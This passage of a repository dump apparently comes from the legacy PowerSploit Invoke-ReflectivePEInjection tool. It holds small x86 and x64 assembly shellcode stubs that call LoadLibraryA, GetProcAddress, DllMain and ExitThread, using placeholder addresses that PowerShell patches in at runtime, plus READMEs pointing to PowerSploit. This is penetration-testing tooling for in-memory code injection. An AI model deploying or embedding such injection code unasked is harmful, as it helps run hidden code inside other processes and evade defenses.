7 | mov rbx, 0x4141414141414141
8 | mov [rbx], byte 0x01
9 |
10 | ; Call exitthread instead of exitprocess
11 | sub rsp, 0xc0
12 | and sp, 0xFFf0 ; Needed for stack alignment
13 | mov rbx, 0x4141414141414141
14 | call rbx
15 |
--------------------------------------------------------------------------------
/Invoke-ReflectivePEInjection/Shellcode/x64/GetFuncAddress.asm:
--------------------------------------------------------------------------------
1 | [SECTION .text]
2 |
3 | global _start
4 |
5 | _start:
6 | ; Save state of rbx and stack
7 | push rbx
8 | mov rbx, rsp
9 |
10 | ; Set up stack for function call to GetProcAddress
11 | sub rsp, 0x20
12 | and sp, 0xffc0
13 |
14 | ; Call getprocaddress
15 | mov rcx, 0x4141414141414141 ; DllHandle, set by PS
16 | mov rdx, 0x4141414141414141 ; Ptr to FuncName string, set by PS
17 | mov rax, 0x4141414141414141 ; GetProcAddress address, set by PS
18 | call rax
19 |
20 | ; Store the result
21 | mov rcx, 0x4141414141414141 ; Ptr to buffer to save result,set by PS
22 | mov [rcx], rax
23 |
24 | ; Restore stack
25 | mov rsp, rbx
26 | pop rbx
27 | ret
28 |
--------------------------------------------------------------------------------
/Invoke-ReflectivePEInjection/Shellcode/x64/LoadLibraryA.asm:
--------------------------------------------------------------------------------
1 | [SECTION .text]
2 |
3 | global _start
4 |
5 | _start:
6 | ; Save rsp and setup stack for function call
7 | push rbx
8 | mov rbx, rsp
9 | sub rsp, 0x20
10 | and sp, 0xffc0
11 |
12 | ; Call LoadLibraryA
13 | mov rcx, 0x4141414141414141 ; Ptr to string of library, set by PS
14 | mov rdx, 0x4141414141414141 ; Address of LoadLibrary, set by PS
15 | call rdx
16 |
17 | mov rdx, 0x4141414141414141 ; Ptr to save result, set by PS
18 | mov [rdx], rax
19 |
20 | ; Fix stack
21 | mov rsp, rbx
22 | pop rbx
23 | ret
24 |
--------------------------------------------------------------------------------
/Invoke-ReflectivePEInjection/Shellcode/x86/CallDllMain.asm:
--------------------------------------------------------------------------------
1 | [SECTION .text]
2 | global _start
3 |
4 | _start:
5 | ; Get stack setup
6 | push ebx
7 | mov ebx, esp
8 | and esp, 0xfffffff0
9 |
10 | ; Call DllMain
11 | mov ecx, 0x41414141 ; DLLHandle, set by PowerShell
12 | mov edx, 0x1 ; PROCESS_ATTACH
13 | mov eax, 0x0 ; NULL
14 | push eax
15 | push edx
16 | push ecx
17 | mov eax, 0x41414141 ; Address of DllMain, set by PS
18 | call eax
19 |
20 | ; Fix stack
21 | mov esp, ebx
22 | pop ebx
23 | ret
24 |
--------------------------------------------------------------------------------
/Invoke-ReflectivePEInjection/Shellcode/x86/ExitThread.asm:
--------------------------------------------------------------------------------
1 | [SECTION .text]
2 | global _start
3 |
4 | _start:
5 | ; Set a var to 1, let PS know the EXE is exiting
6 | mov ebx, 0x41414141
7 | mov [ebx], byte 0x01
8 |
9 | ; Call exitthread instead of exit process
10 | sub esp, 0x20
11 | and esp, 0xFFFFFFc0 ; Needed for stack alignment
12 | mov ebx, 0x41414141
13 | call ebx
14 |
--------------------------------------------------------------------------------
/Invoke-ReflectivePEInjection/Shellcode/x86/GetProcAddress.asm:
--------------------------------------------------------------------------------
1 | [SECTION .text]
2 |
3 | global _start
4 |
5 | _start:
6 | ; Save state of ebx and stack
7 | push ebx
8 | mov ebx, esp
9 |
10 | ; Align stack
11 | and esp, 0xffffffc0
12 |
13 | ; Call GetProcAddress
14 | mov eax, 0x41414141 ; DllHandle, supplied by PS
15 | mov ecx, 0x41414141 ; Function name, supplied by PS
16 | push ecx
17 | push eax
18 | mov eax, 0x41414141 ; GetProcAddress address, supplied by PS
19 | call eax
20 |
21 | ; Write GetProcAddress return value to an address supplied by PS
22 | mov ecx, 0x41414141 ; Address supplied by PS
23 | mov [ecx], eax
24 |
25 | ; Fix stack
26 | mov esp, ebx
27 | pop ebx
28 | ret
29 |
--------------------------------------------------------------------------------
/Invoke-TokenManipulation/README.md:
--------------------------------------------------------------------------------
1 | The tools in this directory are part of PowerSploit and are being maintained there. They are preserved here for legacy, but any bug fixes should be checked in to PowerSploit.
2 |
3 | https://github.com/mattifestation/PowerSploit
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | The tools in this directory are part of PowerSploit and are being maintained there. They are preserved here for legacy, but any bug fixes should be checked in to PowerSploit.
2 |
3 | https://github.com/mattifestation/PowerSploit
--------------------------------------------------------------------------------